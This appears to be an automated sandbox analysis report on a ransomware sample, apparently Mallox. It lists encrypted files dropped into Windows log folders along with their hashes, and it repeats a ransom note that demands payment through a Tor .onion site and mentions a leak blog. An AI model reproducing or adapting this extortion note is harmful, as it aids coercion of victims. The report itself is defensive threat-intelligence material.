                        SSDEEP:192:9/tKovaBzceb4U+gzUzvfrUA555XK3fXg1KRAijgvS7EHOlqqIllGLQ/KJvNiG:dPIzceb49zLUywO+jSQ+vG0SxP
                        MD5:3789B50D59CC3E8874726D25FAC1BDD4
                        SHA1:FA5585CEC776AD2302F8B82101278E6D6D24FE74
                        SHA-256:B0061E7C6509F44B5D7203F512B0135F9D7F2613B8E1883ECD49C88D6F9357F7
                        SHA-512:5E71687DF2C26E9BF58ED88FF28279B35739BDF96863E856DC57CC0C513815DBFBE80D6A58381F21A23433406597B7E1456254EDED2E4346FF077A8037D46616
                        Malicious:false
                        Preview:q...c*...r.|.7,W.{.......N.)H....Q..L...5;..j..UU...?........t)>U.5..X.....`8...%...zA...BX@..M.Q.hJ.K.s&B..#bGs...3..<n..~.........#I.'...^f.1.I.#...........q.;..5..s[.....yxy;.a/o.!..K...ac~A../..n...q..~....e.&._.>M_.......2*o7.X...-+E...C....^.NM...%...(..R.x.L.n.....4..z..3.........+TM. =..B.....g>.a1.|...U..c62..mQ[.Bu..leb...,.Sp..].|.B..{.L....(!......e......X...I..EE...X0.}./w..G.....Fh,....\...).....r).t+....*.AE...hS7..q......{..DJd.Q...m!.....l.P]X....N...w..#5....8........Fr..}..h....M....$.b..P>....GoB..;h..LG..m.\#"...?f....W &D.l...7RzJi.e...qd....Lzn1..f...D1.5.m..H.HK.....'kxm.wXQxo.......s.<]..X.%../2.5.B.f.....6......5.x.*.Y/G....~.....dy....FdL.R..3q7....&P..2..B...i......F...k^.....3...c4`...*.5...M.m....E..t.%N}Y..dD.Q.Z...h.E>..0........Cy..cnW.....lP.{.xqe....w[.#.....n...P8v..B.o...3...m...QHl......LM....$./&.....J.I.6/.m.!cm....8..|...RY......W..q.-........Q.7..=m..]..{O].M.%....J......"..9.+..wI...u|..

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7c7cccd4-7086-4f33-8948-7302a56abbc1.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.983247984369186
                        Encrypted:false
                        SSDEEP:192:Py6IENeujM2kGGHFhx06ENmJyr9o3kZgQ/0nkETjDdKRoJqz4kgWVBr:Au8hFhWOJyrSC0NvDdKRoJqz4YR
                        MD5:CC3CA3732A61844469AD6E96B718A36E
                        SHA1:A0285B1C9A6F063026C3E59C774762D02A17A56E
                        SHA-256:84ECF75342E35BCBE1DEBC7F159CDAD8CCAF42EE2674B0B06F973FAD1687CF81
                        SHA-512:D24656BFF99E1C5AC80FB8CDD9C7FBF6E8D97081679323EF754EB7974A09EAF7A5F95388621442EE7CA5D13A2BEB79D6CB0233A773D2FBDD7DFC8663916236A4
                        Malicious:false
                        Preview:._2.=&.o..^{....t........I.!..y..ya.%...m.Ue.|....J....y.....s".....|I9".P...&S...m.......O.g3~-.(....E....'.$.b.u,..c........ ............%.5(x..1c..3...E..E6...)x..RX.X+oO.R.....3...I....$.u.'.@... .r...<.`..."...&3?gFN.j.g.5.u...:....`.~.>......P/...x.a.}.qL...=..=.<.D4..6..x .T:Z+...Y/Xa..>.@<...o.2........S................]p%....v....XTx+.*\.l.2....]y...?Z...r.(.....<.%..;....X..=!.i._z....Q..[.@y.}.B.1l&.W_.x..H.34...&|.6?....."o5*....}...P.s^.j%X2O#.......-._.f.b..f.....1cW...C.....$.....eG.J.|.S..]......{.l6.R..+F..5....^"..n"...z=.....iW^...I.05<..q/?..X.......`...A..N....+...S.....|..P=......6.XjP.......Ss,..d[.e..;......5.e..4.-.W.A....Y.\.sjo|g..}..`...ZL.....I..".Vb....k-1..E.(.^...b._w!..Q...{b...z;....Q..n.~[qM...r.....Q_..l.YEn+S0;.e.]).. .&.0%...D9..."....x.S6cw.b..e.T..7.=.h^I]=.R.4.e.'.;.... .D.'p...y....d.39...F6.AT..u....P>h.9..2........._...(...Nb}W.3.o.o...+..f..A.y,.f.....R...P1r;...B.J.@..F...O..I..u(..R..S.UD_?..Y.

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.982b6bb8-0ee5-4e29-82a8-48169e4ee164.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.98618092229155
                        Encrypted:false
                        SSDEEP:192:GOuunUV8QYUXfPq03aIzKTo7NVx+PynGPZnzLqjHIJYhz+lT4pyZT3RPUVyiu186:GOuoxQzXfXawx7AZzLqjTzE0/fuh
                        MD5:BE87C0C5138E52485D827F8DB56C7C8A
                        SHA1:9E3493514B23EDDC50341A3654C7C4A7FD9EA39D
                        SHA-256:212188A8186A67728BC8C031A0E1D6A7E072C077685BAAAA93286D49BE5A2C87
                        SHA-512:EEC67578588E856937DC08B4C4A3882AA361FC756E4FF08ABE6A966A32AE9BAA20F186E6C403EE48C83683E9E2B46CC7261A48F02B7223B00F70785F5EFA6DD2
                        Malicious:false
                        Preview:..[...A..]..3..;."....k.........Bog.v7..C..S%....."..u....\.pg....d.U..B..1..\d.m.GW)...u..I..:.|.=.Cp.ipZ.u....`w.......WU_.yWj.:.-C..V.3!C..EnIE..{G~...`....#..\Gv.....MH.~w.........,..3 ...........0.q%.P..........`i..C...`)..^....K..l.G.....8Dx....1..\.b..1...(...%:.....f@...R50..eW..........<. .k....w.....D..J.L}cxX..@...-.%.D.qub...T.2|...$.....s{$.T. }|...........i.n.N....-~..[....Q>...+98.lW..+P[.p.[.....w.|95j........|....?b..t.*l$.....xE..j...k.....lnl4..S9..@|..x...k...hn...I....|.L.Tr..T..8.....!6....%.4*...D`\...*H.....H..l\...V.$W..`9.pr.5H%^.#3...x.........@....F..0.Gf$..Z[=.....rhZ.m.Qv ..NU.,..)....<.5o.sE..Z`dLAa..y...~V..a...z...<: .....d..2M.p..J.......H .8....p....VRF.R..[...br........Q..L.|A..qq..\J......f(J:.........`...j..\..b@Xlq......M .I..R.^2g.w..I.O.......k=XL........K.\...eP...j..?*......Es.% ..z..K,......L.g..........uce3....'....S(.B..3..:..5bR..+_^...O.h.zP7.h.k6.U..pya....M5.6zP.Y...Uk.o.J..,N~.v

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a86fb4e6-f1ef-415e-b2f5-42762e19221e.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.982309371099604
                        Encrypted:false
                        SSDEEP:384:+fG6CL0zksjNWlilIkDLTMt28ZGME+eOtj:oCekKNagIkHTMRMME+5j
                        MD5:1747CC2E25037FDC09E1D24F7C3FA05D
                        SHA1:8251FDAAAAD5FA0732DC2154A67510B926480307
                        SHA-256:3311573A37B967D395431EC7A675E579F2D2CEC95EF263A55A6DB79E1AF9E649
                        SHA-512:948599D95F91D5E6FAEA875F45E1FC3448E388C1AEE9322252E3A86D45356BCBCA71A99BACAC70FBC681047618DE2D767689AE0291AFD476ED6E74B7A7347784
                        Malicious:false
                        Preview:~..7..r.5......o...o.....GA.......m.<4.+n.lv.."5y..~hM...~...........m..z..@...]....c.,>..F...Q..a.+..~...PcR.).5...A..F>>.#~bw.x.L>...c_..`..7..l..v..V.......v}G.~.....b.......U%..H$K....&..4.B.n.V)I..<<#.......!...@..7m.K.........L........OJ........e."J..]..Z.>b.dsk..U.\\.**..+].x..w.{.7's.nV..:............._.].......$..M..."t..O.bf..*..r_.7....!...r.Py.q..........V2J.fw7....'Jo,v....2.x....=.........k..b....E.".9.+...N%.[a...4..rg.....WO.....G...%..]@..eF#.....2.kH..v.,?3.<2..v...s...(...N..>..D.......A...P...h........q..Ll.p\V..3...@d.:.*|.x.8..V[J....Y7.A./.?.-a.n.....2]Bv.....Ag.Q.6^.>h,L....b..g`............k.u.%.K...N-O. ...............tI)...j.s..;../..NhL.)K.U/q.......{./.o0.}....%...{.5...2..d.....w.. 6. H7..J..Z6...L>.G.TOm...tQ.$.......^w.U..pP..;.....t..;.u..V022.o:.mnU.M..D.X.P\.H.Sc.D.k}..t..w..u.D.L7...k...\.......;&.%..^.n>p.\.... .....ILH....$P..H.."..W.E1..R.f..mW.?>.,:J......BV......*3.....>..vk.v.6.7..<.n..0.N,.....

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.da045677-24e5-45c9-83e3-241d3d58543b.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.9865979989905815
                        Encrypted:false
                        SSDEEP:384:HwSfn0cA5bdWisUvcEtIm73izQP6toygaGlt:H5fn0vFQ0cEeZYlt
                        MD5:BA729FBBC0230819BA2D0F4AFB4A2566
                        SHA1:D6697C5ACB93D819EDDDFC942F7B6365B72A340B
                        SHA-256:743B468DC52B1F78F56D3ED53AF5A6CFC74549739C0E7D021A682E5F08C87D25
                        SHA-512:373DB3F4EEC77D102C6B982498DF07150C1AD61867EE54C3F538C52412770A4B75686DC5BB0F2704A096F406B2E2686553852944DDCFEFDF495E595A90A6795E
                        Malicious:false
                        Preview:s..M....0~.FQ.@...'....{A..i.g..B...c.7....Y.y.....T..FkA.....u.D....}..U....s.3....M..3x...'k...........pH,Q`.s.....rN.M+....5.__0i*.....5Z.4..{y..@.`....>.Ij$.br..6...x.'$..)(a....JLOC.E...Q.....ZJ......[..E..>........G..Wv..!9q.YrTI.f+}...}.EK'....wCR...x.Q0..kQ...M..;.....Z.......(3....8..e.^c.qi+K.p>..9...F"...y.~d[X..a.n..xx56g.l...P9..J&...;'I.....+...X$.yO.O..p....`~....."...>...q.%.....[E..:==.....q..'...K9.=C.4....pw.....3.....w.8....$R...k.We..........}m~.%../A..u...F.'.`.i.&....w.......].....79T...w\.....Z.....>.:K.y.G.....z.U.d`o..NN_.x......a}.....;U.A..B..SEle..l1.m ..f..........K.._.J.8..JV}M@g..69..Bj...d-YO2A=.3H...Y..aG.$!..;..e.....'..<....g.02..v......Pa./..._..>.)].X....b.l.8#3.1.s..`c..U$..em....,s.Ki..AY..l.[JT.!...V.,........Vn....J.I.X.}..vF.:T...o.2........(...F...Ct./l.`.O....e...._3.x.r?.._......byX..Q.....JI.."s....`~..w...*2...H...J*..Ld#].g..!.-&;.D.4....9d.S..B.]g[k..'....Q...t..'<.E.:q..8..K)N...

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.dcf24dad-21eb-488a-87ac-14b2b710b769.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.986925168693699
                        Encrypted:false
                        SSDEEP:384:h4Yt0xDnAturvqjPSGFaEo2vfVeQ+hK0uF2t:uYmnrvqbSGFasvdAi8t
                        MD5:EFB1F23A320EC8F2A17736D45A9F3F56
                        SHA1:1B552E96B00DFC8F3BC543116F5FDB98CE54806B
                        SHA-256:114E97AB10480E7557483B31CED86C48DDEB632AE4BF93A532D833FFB343826A
                        SHA-512:77101B76A0F5838B1FC33ABF0C28EFF3D11994841114DAFC22877226F6C6A99C566724B843CD9163B9B494F806A884D1977ECBB759C7B0F68D58A6824D35EFB4
                        Malicious:false
                        Preview:}..{.K.+B,.D..n....B...!...rA]-.!5aV_f%bZ;...?d....s.m..R..r....h..t/.....Pd..BOE...#.....*.9!<w%...(UD..]....;.@.@?..Y....@....(..S:{N.Y.c5..2.RR......Z.....|AZ..j^...7p.|f%..W.P.....a........Kj..p.(l..;.g).T.Z..i1&.....D..-34.g...Cc.....3....l%?.22<...x.../w...~..T!.%?&,Yt..,...5..V.,....5...$0F'.T.R.J.......C.9e..{.Km.h....s.Z-.0.....03..so.0qV.H...4....s]..../.8..R.),q....Z.FO`R.kl.p...|\.u'".k.W.....A..Rv7t(...L.(%.....B........r..Cs..i6..F..u......w..._+....Z.@..Ve......a-.......p..bT.2q5.,.~v..RE......4`T.,..xL.P..C.....dZgi._A.U.f).....hIBJ}.;..2YE....DL.....oFY..Y...O.....^.E~Z7...[.Gj.#Sq.../:@moG.0......G.]MT.L{..~Z..)..z!.....p.w..n.7)..nc_'.P.zp?...H.a.......8...l...|>.....X<i.Z..0..%.4..DQ.....G...M.I.Qh.Znb.,.,..t.s.K...(7.D...)sW...e.S....}X.|u..\.../2.Zz.A..M....HBt...2...........]3.07*....U....6..2..>.\sp...n.D1G.b.....}...".A......x!....fU.s..Qs2F.+..b;v.v....H..-......b..,....CX..P...G...T.6Rl.s.0.x^,.".%..9

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.ff37896c-1a83-4322-9019-274c41336c13.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.989158343521555
                        Encrypted:false
                        SSDEEP:384:SEh1XX72Nmuu30Mb1vcZKhr9obLpR18TmdkgSZ:51H72NU0MbSUovpRXSZ
                        MD5:7CC3905F3C95B4A83BFEC6A48577FF8F
                        SHA1:543095C090296C39A77F7E5CC50D017021B2C2F7
                        SHA-256:3AC7E3FE73301A0651A3CFA3E767482D8F6039855CAFAA400B43A5877E3582B8
                        SHA-512:3916E936FD1FF5728774EC339B5D9FE35A20FDEB1E815F70A53F09FCF23BC08BA23C8B0A179024CD755669D0D55916F00B07BABB2974B5A96E82E964B9AAF516
                        Malicious:false
                        Preview:...9.....IZ..Sv.x...w.H...c!.osq]O..0...T.<c..$$..J..`./....-..n./....c.c!..X..|...z..u.]....._.&...P.2@.. .G.\..D6....{8.%..6#k...R........n......|7i...iKH.gX...../!.Z...i..ju.>)l.kr-6(u..[......=.y..Gn....'e..Kh.x....mm...\w..U...fH...PE.9.....U..L.E.w...t...s..nw.q.D...w.......<.....(........&Mz`..F....a.3zE.P.BnL1Y...... .u]5.f:0.i...b;....t%....?.l..)..z.........vZ<.zu-A..N... .VV.]_..8..i..2....8iTS...:.v0.f*....P .1.O^o...M}...;.u....4 ...G............8d...."...b..q....3..g>g.}........#..m.`X../.....n.[5..X..I.|u=7X).q...._..Z.r6...fC.#..g..*;..u.........U.J.....i.3..c.hj3...$...S.y.A...9.;....p+.'......Y....a....k.J..N+.5dv.T...wj..g....,.P'.L.z..W +.v.5l....:..J.c..........j.;v.nb...c.Z#......!.W5._..!.......MU.g...XW...(.f..6..`=v=y%@r.......B..o.'..DU.":..;z.1`....>i...9z8...j.i_.V;..k.}..'~../........Y.....XN%Gp.z.3..B.......j@..Hn....I....'....h.1..Cy.V2..*..[..c2..`|kX.]A@C...dY....f..,..3.M.S....`<.Q..83...T.)_.U.

                        C:\ProgramData\USOShared\Logs\System\WuProvider.8b76dbfc-b232-4f54-8aad-d9196c0d5c6c.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.990093689849652
                        Encrypted:true
                        SSDEEP:384:OKDPi/Lik9r8D+pi2AidT1kegd1U+ng1H0cVMBgi+ek6ip:zPiJ9r8zS9OP1U+gWzgi5kf
                        MD5:C0A115E7401C8059F1BCADB6CC174806
                        SHA1:96014D8978E0D39743AF254084C4AA7F3CE40881
                        SHA-256:A696AE2BF2164309FE0EECB71A7952A7BFFF4A4606C1311B5FD2F61C539B6339
                        SHA-512:80127E82C62F23140CEFFC9534C76F305749FE1369882160218B4A36D6E754E63C3B0DFAF6B4B225EFBE36CFD6BF645F85C5314F896B211086A4129C4A1F2283
                        Malicious:true
                        Preview:..}..a...O.....> w..;2.V..c-..:._.+..5..v%.....exn..h.m.]..j&._hIE.<Cr..;..-.h~k......{..u...@...JN..L.N.a#.q...UJ.*.d.`F...W|Vsm..Pm.."b..Q..Ud.Q..@.P|X.I..D2.YO9.W^.t...9".s.e.Q2.D..=.st.x.=.U.lp....j[o..6..(...4.....f{g.....{.=.....Lw.C..mY.O......uF.z..@.$1..n.p....J...0.j.....\?.N.g`..K......F+..C..F.zT{=[...TE.........(y....f.O...?..l.I..8P0..Z..Ec<.G.l..K..[."....*|....".......O.:....i0..N.`..%.....p.q?Z.1.....69......<3....&KNl..-..!.1.E.>...o..hb..?.....Z.o..!......._...._.....a..Q..P.U%..ce.....fG&-.(.+...d....X.K..K'O*&.Q.o.b.K.Z....#.....3....06..g.'....b..~.6......+7.3..i... .....G+Yx.I<.;..>...R..>..W..&..6.........?*..:].0....\.+|........f0.....IM.....|..J^k.-..5c....[......B.....U..>..3h.,tf..3p.........ob..(..&...7YPr..d...a...d~..y...%`}b...B.bj'..+.4X.l.1..=.....6.(K...*(]....n..KC.3`cZ.m... ....$..p....f...Y....e.H..0:e8$-.....J..:..T.uU.\.....I". yX.{..sz.......T.?Xp..o.W.......<;..u..5.T..ZV+..s[....7......'.._./.....

                        C:\ProgramData\USOShared\Logs\System\WuProvider.cd10c994-6e5b-4302-9bb7-4110b2d7c98b.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24684
                        Entropy (8bit):7.991361108057593
                        Encrypted:true
                        SSDEEP:768:MpJCCxPH6ope4jpPvqbFX/WII0YarcHTpA:MDCCxbpfj+9/carcHK
                        MD5:6DD6E780B288D38FDAC379EF2534FC30
                        SHA1:1224A1CDCCDBD345A846DB88066150E7175FBDF5
                        SHA-256:D4ECDA7B062A11B488953F484376429030C5CD6D97915E8056C269283053FFFD
                        SHA-512:2088CAF55C61E99444FFBD66EC0FFB30872862DC919A8FA4E486CFEC8252C871F0544A8B0CAC8268EE3817169C0C6C67305B1E3E5D4F327267797B4060ABD2C1
                        Malicious:true
                        Preview:.....%..p.k.Ry.L...H...@.....7.M.......m9n_.v~..I.....21.u..u.g.<.?..dh........m3/.~p&..P..x.|..v.. M.......k...-..P.aI.."Y.x.q*..BA.\.n%...A.5.f.Z.GI...Uf.e.\N]k.....Z.3.......X.HM.........._w.......6zg.I.tt..%.+............8.Xi.|1..Gu{,.y.X^.E...5p......".U....... D..}i-6..Q....+....d..4.v.sc/.9.....[......62..C........ .....[.....+......)t8...W. ..a.q..r.9....Q. ANZ..h<..B.L.,...&....@.=. ..Bm.!....Ud......5.(.Q..O.0.-.b.k...N.t.,.jE..H...Q.h.`.(....r,...q..b.*.q...g........"&...*..(..OTX.MOP8.x....2.zVO*F..,...o..'....a..:N......0]./..].@......?K.*....?:}o..f.7...V..o....>..G.... .G.......QH.T0...R...1`\.......Cfj..;.!....Y......Fp.yk..[.=.TC........Z.H.'].8 ....k.(X.&pm..,..."Q_.J.O.........e...$M...$.........y...........rxmH..V.b.T...p..[^.."..%5...y.._.........(R*....F..e.cK......}vCr.S....v!W..8.E2Gh? .L..M....kP[.n..\V{J.mV}.).h.W+.<.<......(....%....qc;..a8Z;MQ....`V.@-...%.i).Rv .A.....&.`v.ld...#..@?L6>..LI.L.-$Y..~.6

                        C:\Users\Default\AppData\Local\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Local\Microsoft\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Local\Microsoft\Windows\History\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Local\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
